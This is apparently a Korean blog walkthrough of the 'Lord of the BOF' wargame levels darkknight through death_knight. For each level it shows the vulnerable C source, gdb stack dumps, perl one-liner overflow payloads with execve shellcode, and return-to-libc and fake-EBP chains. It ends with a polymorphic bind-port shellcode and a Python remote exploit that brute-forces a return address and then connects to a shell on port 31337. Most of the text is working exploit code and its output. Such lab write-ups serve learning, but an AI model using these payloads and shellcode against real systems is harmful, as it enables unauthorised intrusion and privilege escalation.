80484a1: c9 leave
80484a2: c3 ret
SFP의 마지막 한 바이트만 바꿀수 있는 문제이다.
연속된 leave, ret을 이용하여 해결하는 문제이다.
SFP를 바꾼 다음, leave ret를 통해 stack의 위치를 변경하고, 그 다음(main의) leave ret에서 원하는 지점으로 점프하는 문제이다.
leave 는
mov ebp, esp
pop ebp
ret 는
pop eip
와 같다.
[problem_child buffer][SFP][RET][main variables][SFP][RET] 의 형태로 stack이 구성된다.
여기서 SFP를 problem_child buffer의 주소로 변경하면,
main으로 돌아갔을 때, esp는 problem_child buffer를 가르치게 되고, 그 뒤에 나오는 leave, ret 에 의해서
[DEAD][EIP][shellcode][..][SFP의 마지막 한바이트] 의 형태로 shellcode를 구성하면 된다.
(gdb) x/100x 0xbffffaa0
0xbffffaa0: 0x40066070 0x40106980 0x08048500 0xbffffac4
0xbffffab0: 0x401081ec 0xbffffaec 0x08048466 0x08048500
0xbffffac0: 0xbffffac4 0x41414141 0x42424242 0x90909090
0xbffffad0: 0x31909090 0x2f6850c0 0x6868732f 0x6e69622f
0xbffffae0: 0x5350e389 0xd231e189 0x80cd0bb0 0xbffffa00
0xbffffaf0: 0x0804849e 0xbffffc50 0xbffffb18 0x400309cb
0xbffffb00: 0x00000002 0xbffffb44 0xbffffb50 0x40013868
0xbffffb10: 0x00000002 0x08048390 0x00000000 0x080483b1
0xbffffb20: 0x0804846c 0x00000002 0xbffffb44 0x080482e4
0xbffffb30: 0x080484dc 0x4000ae60 0xbffffb3c 0x40013e90
[golem@localhost golem]$ ./ttttttttt "`perl -e '{print "AAAA","\xcf\xfa\xff\xbf","\x90"x7,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","\xc4"}'`"
[golem@localhost golem]$ ./darkknight "`perl -e '{print "AAAA","\xcf\xfa\xff\xbf","\x90"x7,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","\xc4"}'`"
AAAA饋퓧릱릱릱1픐h//shh/bin됥PS됣1柰
?퀭퓹
M???옹 @
bash$ id
uid=511(golem) gid=511(golem) euid=512(darkknight) egid=512(darkknight) groups=511(golem)
bash$ whoami
darkknight
bash$ id
uid=511(golem) gid=511(golem) euid=512(darkknight) egid=512(darkknight) groups=511(golem)
bash$ /bin/my-pass
euid = 512
new attacker
bash$
bash$
==========================================================================
[darkknight@localhost darkknight]$ cat bugbear.c
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack betrayed you!!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
[darkknight@localhost darkknight]$
=====================================================================
이제 RTL 문제구나!..
간단하게 풀어보자.
[darkknight@localhost darkknight]$ export FMT="%513d%3\$n%4\$n"
[darkknight@localhost darkknight]$ ./envvvvv FMT
%513d%3$n%4$n : 0xbffffead
[darkknight@localhost darkknight]$ ./envvvvv SHELL
/bin/bash : 0xbfffff48
(gdb) x/100x $esp-0x20
0xbffffa90: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffaa0: 0x41414141 0x41414141 0x42424242 0x41414141
0xbffffab0: 0x4006604c 0x400cc104 0xbffffead 0x400c4e20
0xbffffac0: 0x400cc103 0xbffffa90 0xbffffa94 0x40058ae0
0xbffffad0: 0x41414141 0xbfffff48 0xbffffa00 0x080482e0
0xbffffae0: 0x080484dc 0x4000ae60 0xbffffaec 0x40013e90
0xbffffaf0: 0x00000002 0xbffffbe5 0xbffffbef 0x00000000
0xbffffb00: 0xbffffc48 0xbffffc5d 0xbffffc76 0xbffffc95
0xbffffb10: 0xbffffcb7 0xbffffcc7 0xbffffe8a 0xbffffea9
0xbffffb20: 0xbffffebb 0xbffffedb 0xbffffef0 0xbfffff12
pop-ret : 0x400cc104
pop-pop-ret : 0x400cc103
[BUF] [SFP] [printf] [pop-ret] [FMT(%3$n%4$n)] [setreuid] [pop-pop-ret] [selfaddr] [selfaddr] [system] [AAAA] [/bin/sh]
"`perl -e '{print "A"x40,"BBBB","\x4c\x60\x06\x40","\x04\xc1\x0c\x40","\xad\xfe\xff\xbf","\x20\x4e\x0c\x40","\x03\xc1\x0c\x40","\xc0\xfa\xff\xbf","\xc4\xfa\xff\xbf", "\xe0\x8a\x05\x40", "AAAA", "\x48\xff\xff\xbf"}'`"
[darkknight@localhost darkknight]$ ./bugbear "`perl -e '{print "A"x40,"BBBB","\x4c\x60\x06\x40","\x04\xc1\x0c\x40","\xad\xfe\xff\xbf","\x20\x4e\x0c\x40","\x03\xc1\x0c\x40","\xc0\xfa\xff\xbf","\xc4\xfa\xff\xbf", "\xe0\x8a\x05\x40", "AAAA", "\x48\xff\xff\xbf"}'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBL`@?@??N
@?@저옭?욈?@AAAAH?
bash: /home/darkknight/.bashrc: Permission denied
bash$ whoami
bugbear
bash$ id
uid=513(bugbear) gid=512(darkknight) egid=513(bugbear) groups=512(darkknight)
bash$ /bin/my-pass
euid = 513
new divide
bash$
=================================================================================
[bugbear@localhost bugbear]$ cat giant.c
/*
The Lord of the BOF : The Fellowship of the BOF
- giant
- RTL2
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main(int argc, char *argv[])
{
char buffer[40];
FILE *fp;
char *lib_addr, *execve_offset, *execve_addr;
char *ret;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// gain address of execve
fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
fgets(buffer, 255, fp);
sscanf(buffer, "(%x)", &lib_addr);
fclose(fp);
fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
fgets(buffer, 255, fp);
sscanf(buffer, "%x", &execve_offset);
fclose(fp);
execve_addr = lib_addr + (int)execve_offset;
// end
memcpy(&ret, &(argv[1][44]), 4);
if(ret != execve_addr)
{
printf("You must use execve!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
===============================================================================
처음으로 EIP가 변경되는 부분이 execve 함수여야 한다.
int execve (const char *filename, char *const argv [], char *const envp[]);
에그를 만들어야겠군;
$1 = {<text variable, no debug info>} 0x400a9d48 <__execve>
/tmp/egg : 0xbffffec5
"`perl -e '{print "A"x40,"BBBB","\x48\x9d\x0a\x40","CCCC","\xc5\xfe\xff\xbf","\xf4\xfa\xff\xbf","\xfc\xff\xff\xbf"}'`"
권한 때문에 디버깅이 안되네.ㅡㅡ;;
--> 소스가 있으니, 수정해서 컴파일해서 테스트하자..;
execve 함수의 인자를 보자.
첫번째 인자는 실행하고자하는 파일명이 저장되어 있는 위치를 가르키는 포인터 값이다. 즉, egg 환경변수의 주소값이면 된다. 이건 ..뭐-.
두번째 인자가 문제인데.
포인터의 배열을 받고 있다.
포인터의 배열에는 첫번째 인자에 들어간 값과 다음주소에는 null 값이 들어가야 하는데. 이 부분을 넣기가 애매하다.
- 인터넷을 뒤져보니, 일반적(?)으로 사용되는 기법이, shell에 의해 명령어가 실행되고 프로세스가 실행될 때 stack의 가장 top 부분에 자기 자신의 argv와 environment 값이 스택에 저장된다.
즉, 어떤 프로세스에 의해서 자기 자신이 실행될 것 이므로, 부모프로세스에서 사용한 execve의 두번째, 세번째 인자가 스택의 가장 윗 부분에 저장이 되는 것이다.
- 말이 좀 이상해보일수도 있지만. 뭐..그렇다- 알아들을 사람은 알아듣겠지..ㅡㅡ.
- 여튼, 파일명을 바꿔서 실행하면, [우리가 원하는 주소(링크파일명의 끝 부분)][NULL] 로 구성되는 포인터 배열을 만들수 있다.
그럼, 여기에서도 링크를 생성하여 파일명을 속여 프로그램을 실행시킬 수 있을 것이다.
세번째 인자는...크게 중요하지 않으니 대충 넣어도 될 것 같다.
여튼..뭐 이런 방법이 있는데, 다른 방법은 또 없을까?
[bugbear@localhost bugbear]$ cat tmp/ex.c
#include <stdio.h>
int main()
{
char *ss[2];
ss[0] = "df";
ss[1] = NULL;
execve("/bin/ls", ss, NULL);
return 0;
}
[bugbear@localhost bugbear]$
를 컴파일해서 실행하면. 동작한다. 즉, 두번째 아규먼트는 크게 중요하지 않다?...
(gdb) x/100x $esp
0xbffffae4: 0xbffffec5 0xbffffff4 0xfbfffffc 0x00000000
0xbffffaf4: 0x080484b0 0x00000000 0x080484d1 0x08048560
0xbffffb04: 0x00000002 0xbffffb24 0x080483b4 0x080486bc
0xbffffb14: 0x4000ae60
훔..된다.ㅋㅋ 아규먼트는 포멧만 맞추면 되나보다..;
[bugbear@localhost bugbear]$ ./giant "`perl -e '{print "A"x40,"BBBB","\x48\x9d\x0a\x40","CCCC","\xc5\xfe\xff\xbf","\xf4\xfa\xff\xbf","\xfc\xff\xff\xbf"}'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBH?
@CCCC퉜웃?웠?
bash$ whoami
giant
bash$ is
sh: is: command not found
bash$ ls
ls: .: Permission denied
bash$ id
uid=514(giant) gid=513(bugbear) egid=514(giant) groups=513(bugbear)
bash$ /bin/my-pass
euid = 514
one step closer
bash$
================================================================================================
[giant@localhost giant]$ cat assassin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- assassin
- no stack, no RTL
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer+sfp hunter
memset(buffer, 0, 44);
}
[giant@localhost giant]$
===============================================================================================
RTL도 아니고, BOF도 아니면...ROP인가?..
쉬운방법은 첫번째 RET 부분에 그냥 메인함수의 RET 코드의 주소를 넣고, 그 뒤로 RTL을 그냥 진행하는 방식인데.
문제에서 원하는 방법은 이게 아닐터......
벌써 ROP가 나올리도 없는데....흠;..
그냥 쉬운 방식으로 풀자.
0x804851e <main+174>: ret
"`perl -e '{print "A"x40,"BBBB","\x1e\x85\x04\x08","\xe0\x8a\x05\x40","CCCC","\xc7\x01\x10\x40"}'`"
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
이번엔 system으로?..
0x401001c7: "/bin/sh"
[giant@localhost giant]$ ./assassin "`perl -e '{print "A"x40,"BBBB","\x1e\x85\x04\x08","\xe0\x8a\x05\x40","CCCC","\xc7\x01\x10\x40"}'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
?@CCCC?@
bash$ whoami
assassin
bash$ is
sh: is: command not found
bash$ id
uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant)
bash$ /bin/my-pass
euid = 515
pushing me away
bash$
bash$
==================================================================
[assassin@localhost assassin]$ cat zombie_assassin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- zombie_assassin
- FEBP
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
// strncpy instead of strcpy!
strncpy(buffer, argv[1], 48);
printf("%s\n", buffer);
}
[assassin@localhost assassin]$
=================================================================
stack hunter가 없는 대신 strcpy 대신 strncpy를 사용하여 4바이트만 overwrite할 수 있다.
leave, ret를 두번 연속호출 하여 stak을 바꾼다?..
0x80484df <main+159>: leave
0x80484e0 <main+160>: ret
0xbffffb90: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffba0: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffbb0: 0x08048390 0x0000000b 0x00000203 0x0000000c
0xbffffbc0: 0x00000203 0x0000000d 0x00000203 0x0000000e
0xbffffbd0: 0x00000203 0x00000010 0x0febfbff 0x0000000f
0xbffffbe0: 0xbffffc04 0x00000000 0x00000000 0x00000000
0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc00: 0x00000000 0x36383669 0x742f2e00 0x74747474
0xbffffc10: 0x74745f74 0x74747474 0x41007474 0x41414141
0xbffffc20: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc30: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc40: 0x42414141 0x1e424242 0xe0080485 0x4340058a
0xbffffc50: 0xc7434343 0x00401001 0x3d445750 0x6d6f682f
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
"`perl -e '{print "\x27\xfc\xff\xbf","\xe0\x8a\x05\x40","CCCC","\xc7\x01\x10\x40","A"x24,"\x27\xfc\xff\xbf","\xdf\x84\x04\x08"}'`"
[assassin@localhost assassin]$ ./zombie_assassin "`perl -e '{print "BBBB"x1,"\xe0\x8a\x05\x40","CCCC","\xc7\x01\x10\x40","A"x24,"\xa0\xfa\xff\xbf","\xdf\x84\x04\x08"}'`"
BBBB?@CCCC?@AAAAAAAAAAAAAAAAAAAAAAAA좞욀
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ whoami
zombie_assassin
bash$ /bin/my-pass
euid = 516
no place to hide
bash$
buffer의 위치 때문에 삽질을 좀 했다.
fake ebp로 바꾸어진 스택의 위치로 인해 내가 입력한 값들이 덮어써지는 현상들이 발생하여 생긴 문제인듯 하다.
흠....-_-;
=======================================================================================
[zombie_assassin@localhost zombie_assassin]$ cat succubus.c
/*
The Lord of the BOF : The Fellowship of the BOF
- succubus
- calling functions continuously
*/
#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>
// the inspector
int check = 0;
void MO(char *cmd)
{
if(check != 4)
exit(0);
printf("welcome to the MO!\n");
// olleh!
system(cmd);
}
void YUT(void)
{
if(check != 3)
exit(0);
printf("welcome to the YUT!\n");
check = 4;
}
void GUL(void)
{
if(check != 2)
exit(0);
printf("welcome to the GUL!\n");
check = 3;
}
void GYE(void)
{
if(check != 1)
exit(0);
printf("welcome to the GYE!\n");
check = 2;
}
void DO(void)
{
printf("welcome to the DO!\n");
check = 1;
}
main(int argc, char *argv[])
{
char buffer[40];
char *addr;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// you cannot use library
if(strchr(argv[1], '\x40')){
printf("You cannot use library\n");
exit(0);
}
// check address
addr = (char *)&DO;
if(memcmp(argv[1]+44, &addr, 4) != 0){
printf("You must fall in love with DO\n");
exit(0);
}
// overflow!
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// stack destroyer
// 100 : extra space for copied argv[1]
memset(buffer, 0, 44);
memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));
// LD_* eraser
// 40 : extra space for memset function
memset(buffer-3000, 0, 3000-40);
}
[zombie_assassin@localhost zombie_assassin]$
(gdb) print main
$1 = {<text variable, no debug info>} 0x8048808 <main>
(gdb) print DO
$2 = {<text variable, no debug info>} 0x80487ec <DO>
(gdb) print GYE
$3 = {<text variable, no debug info>} 0x80487bc <GYE>
(gdb) print GUL
$4 = {<text variable, no debug info>} 0x804878c <GUL>
(gdb) print YUT
$5 = {<text variable, no debug info>} 0x804875c <YUT>
(gdb) print MO
$6 = {<text variable, no debug info>} 0x8048724 <MO>
(gdb)
"`perl -e '{print "A"x44,"\xec\x87\x04\x08","\xbc\x87\x04\x08","\x8c\x87\x04\x08","\x5c\x87\x04\x08","\x24\x87\x04\x08","\xc7\x01\x10\x40","/bin/sh"}'`"
[zombie_assassin@localhost zombie_assassin]$ ./succubus "`perl -e '{print "A"x44,"\xec\x87\x04\x08","\xbc\x87\x04\x08","\x8c\x87\x04\x08","\x5c\x87\x04\x08","\x24\x87\x04\x08","\xb8\xfa\xff\xbf"x2,"/bin/sh"}'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA耳??눡?옇??bin/sh
welcome to the DO!
welcome to the GYE!
welcome to the GUL!
welcome to the YUT!
welcome to the MO!
bash$ whoami
succubus
bash$ id
uid=516(zombie_assassin) gid=516(zombie_assassin) euid=517(succubus) egid=517(succubus) groups=516(zombie_assassin)
bash$ /bin/my-pass
euid = 517
here to stay
bash$
bash$
===========================================================================
[succubus@localhost succubus]$ cat nightmare.c
/*
The Lord of the BOF : The Fellowship of the BOF
- nightmare
- PLT
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>
main(int argc, char *argv[])
{
char buffer[40];
char *addr;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// check address
addr = (char *)&strcpy;
if(memcmp(argv[1]+44, &addr, 4) != 0){
printf("You must fall in love with strcpy()\n");
exit(0);
}
// overflow!
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// dangerous waterfall
memset(buffer+40+8, 'A', 4);
}
[succubus@localhost succubus]$
strcpy로 stack을 덮어쓰면 되나?..
1. 쉬운 방법은 두번쨰 아규먼트에 쉘코드를 넣고, AAAA를 해당주소로 바꾼뒤 점프하면 되는데...다른 방법은?..
[Ax40][SFP][RET(strcpy)][AAAA][dest(AAAA address)][src(argv[2] address)] [shellcode]
"`perl -e '{print "A"x44, "\x10\x84\x04\x08","BBBB","\x90\xfa\xff\xbf","\x24\xfc\xff\xbf"}'`" "`perl -e '{print "\x2e\xfc\xff\xbf"}'`" "`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
"`perl -e '{print "A"x44, "\x10\x84\x04\x08","BBBB","\x90\xfa\xff\xbf","\x29\xfc\xff\xbf"}'`" "`perl -e '{print "\x2e\xfc\xff\xbf"}'`" "`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
2. AAAA를 pop-pop-ret
[pop-pop ret][systemaddr][SFP][/bin/sh][Ax24][SFP][RET(strcpy)][AAAA][dest(AAAA address)][src(pop-pop ret addr)]
strcpy에 의해 덮어써진다.
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
0x8048722 <main+110>: call 0x8048410 <strcpy>
0xbffffb08: 0x4000ae60 0x43434343 0x41414141 0x44444444
0xbffffb18: 0x45454545 0x40013800 0x00000002 0x08048420
0xbffffb28: 0x00000000 0x08048441 0x080486b4 0x00000002
0xbffffae0: 0x400cc103 0x40058ae0 0x42424242 0x401001c7
"`perl -e '{print "\x03\xc1\x0c\x40", "\xe0\x8a\x05\x40","BBBB","\xc7\x01\x10\x40", "A"x24,"CCCC","\x10\x84\x04\x08","\x0c\xfb\xff\xbf","\xe0\xfa\xff\xbf"}'`"
pop-pop-ret : 0x400cc103
흠...버퍼가 끝나지 않아 계속 덮어쓴다..안되겠다;;
[succubus@localhost succubus]$ ./nightmare "`perl -e '{print "A"x44, "\x10\x84\x04\x08","BBBB","\x90\xfa\xff\xbf","\x29\xfc\xff\xbf"}'`" "`perl -e '{print "\x2e\xfc\xff\xbf"}'`" "`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
BBBB멁???
bash$
bash$ whoami
nightmare
bash$ id
uid=517(succubus) gid=517(succubus) euid=518(nightmare) egid=518(nightmare) groups=517(succubus)
bash$ /bin/my-pass
euid = 518
beg for me
bash$
============================================================================================
[nightmare@localhost nightmare]$ cat xavius.c
/*
The Lord of the BOF : The Fellowship of the BOF
- xavius
- arg
*/
#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>
main()
{
char buffer[40];
char *ret_addr;
// overflow!
fgets(buffer, 256, stdin);
printf("%s\n", buffer);
if(*(buffer+47) == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(*(buffer+47) == '\x08')
{
printf("binary image retbayed you, too!!\n");
exit(0);
}
// check if the ret_addr is library function or not
memcpy(&ret_addr, buffer+44, 4);
while(memcmp(ret_addr, "\x90\x90", 2) != 0) // end point of function
{
if(*ret_addr == '\xc9'){ // leave
if(*(ret_addr+1) == '\xc3'){ // ret
printf("You cannot use library function!\n");
exit(0);
}
}
ret_addr++;
}
// stack destroyer
memset(buffer, 0, 44);
memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));
// LD_* eraser
// 40 : extra space for memset function
memset(buffer-3000, 0, 3000-40);
}
[nightmare@localhost nightmare]$
스택도 다 날리고..RTL도 못 하고...ROP인가?...그것도 아닌데..
printf buffer에 넣고 그 쪽으로 쩜프할까?
// 25byte shellcode
`perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
"`perl -e '{print "\x90"x15,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","BBBB","\x06\x60\x01\x40"}'`"
[nightmare@localhost nightmare]$ (perl -e '{print "\x90"x15,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","BBBB","\x06\x60\x01\x40"}';cat)|./xavius
ls
릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣1柰
?BBBB`@ls
d
/bin//sh: d: command not found
id
uid=518(nightmare) gid=518(nightmare) euid=519(xavius) egid=519(xavius) groups=518(nightmare)
whoami
xavius
/bin/my-pass
euid = 519
throw me away
=========================================================================================================
[xavius@localhost xavius]$ cat death_knight.c
/*
The Lord of the BOF : The Fellowship of the BOF
- dark knight
- remote BOF
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <dumpcode.h>
main()
{
char buffer[40];
int server_fd, client_fd;
struct sockaddr_in server_addr;
struct sockaddr_in client_addr;
int sin_size;
if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
exit(1);
}
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(6666);
server_addr.sin_addr.s_addr = INADDR_ANY;
bzero(&(server_addr.sin_zero), 8);
if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){
perror("bind");
exit(1);
}
if(listen(server_fd, 10) == -1){
perror("listen");
exit(1);
}
while(1) {
sin_size = sizeof(struct sockaddr_in);
if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){
perror("accept");
continue;
}
if (!fork()){
send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);
send(client_fd, "You : ", 6, 0);
recv(client_fd, buffer, 256, 0);
close(client_fd);
break;
}
close(client_fd);
while(waitpid(-1,NULL,WNOHANG) > 0);
}
close(server_fd);
}
remote exploit이다+_+.
일단은 별 필터링 없이 buffer가 overflow 나면서 exploit이 가능해보인다.
remote shellcode
http://www.exploit-db.com/exploits/13910/
/*
Title : Polymorphic shellcode that bindport to 31337 with setreuid (0,0) x86 linux shellcode.
Name : 131 bytes bind port 31337 x86 linux polymorphic shellcode.
Date : Sat Jun 17 21:27:03 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>
char bindport[] = "\xeb\x11\x5e\x31\xc9\xb1\x6b\x80\x6c\x0e\xff\x35\x80\xe9\x01"
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xe5\x7b\xbd\x0e\x02\xb5"
"\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8"
"\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\xaf\x9e\xbe\x16\x9f"
"\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16"
"\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b"
"\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5"
"\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e"
"\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(bindport));
(*(void(*)()) bindport)();
}
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
Status message
READ : Death Knight : Not even death can save you from me!
You :
READ :
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
: command not found
ls
: command not found
ls;
bin
boot
dev
etc
home
lib
lost+found
mnt
opt
proc
root
sbin
tmp
usr
var
: command not found
id;
uid=0(root) gid=0(root) euid=520(death_knight) egid=520(death_knight)
: command not found
/bin/my-pass
: No such file or directory
/bin/my-pass;
euid = 520
got the life
: command not found
whoami;
death_knight
: command not found
[xavius@localhost xavius]$ cat exploit.py
#!/usr/bin/python
import socket
import os
import struct
# size = 131
shellcode = "\xeb\x11\x5e\x31\xc9\xb1\x6b\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xe5\x7b\xbd\x0e\x02\xb5\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\xaf\x9e\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5"
p = lambda x : pack("<L" , x)
for i in range(0,100) :
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 256 - 40 - 4 - 4 - 131 = ..70?..
buffer = "A"*44
#buffer = buffer + "\xe0\x8a\x05\x40"
#buffer = buffer + "DDDD"
#buffer = buffer + "BBBB"
#buffer = buffer + "\xc7\x01\x10\x40"
#buffer = buffer + "\x60\xfb\xff\xbf"
buffer = buffer + struct.pack("<L",(0xbfffffff - i*70))
buffer = buffer + "\x90"*70
buffer = buffer + shellcode
print "\nStatus message\r\n"
s.connect(('127.0.0.1',6666))
data = s.recv(1024)
print "READ : ",data
#print "SEND", buffer
s.send(buffer)
data = s.recv(1024)
print "READ : ",data
s.close
os.system("telnet localhost 31337")
[xavius@localhost xavius]$
[death_knight@localhost death_knight]$ cat dropped_item.txt
You're so great! This is a token to the next gate.
,.
,' `.
,' _<>_ `.
,'.-'____`-.`.
,'_.-'' ``-._`.
,',' /\ `.`.
,' /.._ O / \ O _.,\ `.
,'/ / \ ``-;.--.:-'' / \ \`.
,' : : \ /\`.,'/\ / : : `.
< <>| | O >(< ( ) >)< O | |<> >
`. : : / \/,'`.\/ \ ; ; ,'
`.\ \ /_..-:`--';-.._\ / /,'
`. \`' O \ / O `'/ ,'
`.`._ \/ _,','
`..``-.____.-'',,'
`.`-.____.-','
`. <> ,'
`. ,'
`'
[death_knight@localhost death_knight]$
'WarGame > The Lord Of The BOF' 카테고리의 다른 글
| BOF 원정대 fedora core 3. (0) | 2013.11.27 |
|---|---|
| [wargame/BOF원정대] bugbear -> giant (0) | 2013.10.02 |
| BOF 원정대 클리어. (0) | 2013.10.01 |